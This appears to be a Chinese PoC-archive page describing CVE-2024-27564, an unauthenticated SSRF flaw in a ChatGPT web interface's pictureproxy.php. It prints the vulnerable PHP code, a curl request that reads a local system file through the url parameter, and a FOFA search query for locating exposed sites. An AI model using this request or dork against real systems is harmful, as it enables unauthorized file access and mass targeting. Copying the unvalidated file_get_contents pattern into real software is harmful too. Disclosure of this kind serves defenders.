关联漏洞
标题:ChatGPT 安全漏洞 (CVE-2024-27564)Description:ChatGPT是一个基于OpenAI ChatGPT项目API的可视化界面站点。 ChatGPT commit f9f4bbc版本存在安全漏洞,该漏洞源于存在服务器请求伪造(SSRF)漏洞。攻击者可利用该漏洞通过向urlparameter注入特制的URL来迫使应用程序执行任意请求。
介绍
# CVE-2024-27564
## Description:
A vulnerability in `pictureproxy.php` allows remote attackers to perform arbitrary requests by injecting URLs into the url parameter. This SSRF vulnerability can be exploited without authentication, making it particularly dangerous.
The vulnerable code is in the `pictureproxy.php` file. The issue occurs because the function does not properly validate the `url` parameter. The `$_GET['url']` variable is passed to the `file_get_contents()` function, which fetches content from the specified URL. This can lead to SSRF.
## PoC:
```
<?php
if (isset($_GET['url'])) {
$image = file_get_contents($_GET['url']);
header("Content-type: image/jpeg");
echo $image;
} else {
echo "Invalid request";
}
```
Curl Request:
```
curl -i -s -k http://127.0.0.1/pictureproxy.php?url=file:///etc/password
```
## Dorking:
FOFA= `"title="ChatGPT个人专用版""`
## Mitigation:
Proper Management of Input validation is needed.
文件快照
[4.0K] /data/pocs/10e41a4cb5c25e4755729d95907e3da80e356769
├── [ 756] chatgpt.yaml
└── [ 962] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。